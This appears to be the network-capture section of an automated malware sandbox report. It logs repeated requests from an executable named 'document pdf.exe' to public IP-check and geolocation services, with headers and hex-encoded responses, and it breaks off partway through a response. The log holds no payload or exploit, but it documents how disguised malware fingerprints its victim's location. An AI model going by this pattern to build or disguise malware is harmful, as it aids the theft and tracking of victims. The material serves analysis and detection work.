                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 6, 2025 16:01:21.534334898 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 06 Jan 2025 15:01:21 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.649830132.226.8.169802672C:\Users\user\Desktop\document pdf.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 6, 2025 16:01:22.196525097 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 6, 2025 16:01:24.151318073 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 06 Jan 2025 15:01:24 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      HTTPS Proxied Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.649744188.114.96.34432672C:\Users\user\Desktop\document pdf.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-06 15:01:12 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-06 15:01:12 UTC859INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 06 Jan 2025 15:01:12 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1490461
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JPE8BW5%2BmKxV3SrDuc2o8b9POtPqk%2BR%2BGHBBlcH61PU5p27LYuL9KInCgdoeAUXdJeUetxEMomHY1AWFNd01cO7Nr%2BZGKXSJcw4Lpz6GZIDsnlcGQbCZLEUAC9JkOev%2BeBNNm84o"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fdc94fead3578e8-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1966&rtt_var=744&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1463659&cwnd=230&unsent_bytes=0&cid=61dfd25217c39ac7&ts=286&x=0"
                                                                                                                      2025-01-06 15:01:12 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.649750188.114.96.34432672C:\Users\user\Desktop\document pdf.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-06 15:01:12 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-06 15:01:13 UTC859INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 06 Jan 2025 15:01:13 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1490462
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MBuFk%2F3rh0Jx3uOdrvHPZfZwIh%2FNY0wxN4mwkrm%2Fvzul73j85r88dNVck7xC4UgiY%2FhIgUfPMfi1umtRKqXpq%2FNcDlC4Tl4G87cFXO5RhRsnbT1aNVFhYLfiRscqa8kvmyyGoxN7"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fdc95047d0d5e66-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1631&rtt_var=628&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1790312&cwnd=182&unsent_bytes=0&cid=c6126632d08eadc0&ts=142&x=0"
                                                                                                                      2025-01-06 15:01:13 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.649769188.114.96.34432672C:\Users\user\Desktop\document pdf.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-06 15:01:14 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-06 15:01:14 UTC857INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 06 Jan 2025 15:01:14 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1490463
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QAhUOoxf8pBrD%2FbV2NN8ESKy4Z2n0XYD7o68h73hV4bzjxcFFunEgN1rxYV5yu%2Fdp692c893WRR3SMxJXEXkI75oSUf%2Fb9N6IxO1FdF8oZrxuIOYr8l8YsJv%2Fzb0hj4Gf7wGAHOe"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fdc950f68517290-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2005&rtt_var=764&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1422308&cwnd=249&unsent_bytes=0&cid=9b3dd9032c7ddf74&ts=151&x=0"
                                                                                                                      2025-01-06 15:01:14 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.649778188.114.96.34432672C:\Users\user\Desktop\document pdf.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-06 15:01:16 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-06 15:01:16 UTC857INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 06 Jan 2025 15:01:16 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1490465
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EzjPZkbysF%2BdX9q0K8zrdpn683QvrulpuC4FsaLgqfyHie1meKadryZQclaJAqjIWLA5ALAA7%2FNuoTczuJVE18EgNpkDBKYROO2c%2Bx1J8c8bRPVPzu9rAs3xCxz3WKljJKC8BC%2Fb"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fdc95181886726b-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1937&min_rtt=1933&rtt_var=734&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1481481&cwnd=238&unsent_bytes=0&cid=10d7c5e71e7a7f4e&ts=145&x=0"
                                                                                                                      2025-01-06 15:01:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.649790188.114.96.34432672C:\Users\user\Desktop\document pdf.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-06 15:01:17 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-06 15:01:17 UTC861INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 06 Jan 2025 15:01:17 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1490466
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UMT%2BU4ZkJTEwRgDIqR%2Ft0kZ9WDZbwExn3ynLwzxiA%2BWHfW%2BW1P5MC%2F4xbkGkulm5rbZ72q2mXbJth89RqfhIWO5NpzxLbq%2FUdyk2TUcb3G6v2NJx89oFkIdnSNWArB7QmKWhTs7u"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fdc95217a2d43ab-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1592&rtt_var=663&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1571582&cwnd=221&unsent_bytes=0&cid=be4a7bdd8f8d322b&ts=168&x=0"
                                                                                                                      2025-01-06 15:01:17 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.649801188.114.96.34432672C:\Users\user\Desktop\document pdf.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-06 15:01:19 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-06 15:01:19 UTC865INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 06 Jan 2025 15:01:19 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1490468
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bS2yjE98RQhrmDpFCO%2FuKU%2FGFXNDPV7D6Zn%2FOtZByNP36cE6m8Ds0b5Z5MGX%2F2TJp3owfPhPG7RokscEEsP4tG9Ix%2Fk4cYV9JAjgh%2F8K1D4w7gP4%2B%2BSRaUlTOoItke55ccv7NsXS"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fdc952a89ea8c39-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2025&min_rtt=1973&rtt_var=845&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1219715&cwnd=190&unsent_bytes=0&cid=cffae4b09711728b&ts=181&x=0"
                                                                                                                      2025-01-06 15:01:19 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.649813188.114.96.34432672C:\Users\user\Desktop\document pdf.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-06 15:01:20 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-06 15:01:20 UTC855INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 06 Jan 2025 15:01:20 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1490469
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BOUiiJEJvxnb67FHIiAFJ6ntQQnpXNgC896nXpRV1k6RWJe4qcRIFFKCGUEaDQpHyuy9cUmxmgoBxJaIYFlkzw2TO5hsYY%2FJ1J3ay0vqPFWvZJtjLFAT%2FctEn8uA3uYNr9ApctDg"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fdc95339d3c7281-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1980&min_rtt=1977&rtt_var=748&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1457813&cwnd=214&unsent_bytes=0&cid=b77278dcdab921bb&ts=167&x=0"
                                                                                                                      2025-01-06 15:01:20 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.649825188.114.96.34432672C:\Users\user\Desktop\document pdf.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-06 15:01:22 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-06 15:01:22 UTC857INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 06 Jan 2025 15:01:22 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1490471
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SlLx%2B3R4JENDsBiazSXTHiAtQPLqgBngRYHez6CNHNHOWWApzxODHsPWiX3xG629JTVfTqw1FTMtF84TyOb39sHOegdTMFPfrKkMCIgYyVoyx4BlfpHpFE9v%2Fxwjjq%2BUkn%2FC1I8R"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fdc953d3b9b7cf9-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2025&min_rtt=2016&rtt_var=774&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1397797&cwnd=211&unsent_bytes=0&cid=cc475e5480399746&ts=170&x=0"
                                                                                                                      2025-01-06 15:01:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.2.649841188.114.96.34432672C:\Users\user\Desktop\document pdf.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-06 15:01:24 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-06 15:01:24 UTC859INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 06 Jan 2025 15:01:24 GMT
                                                                                                                      Content-Type: text/xml
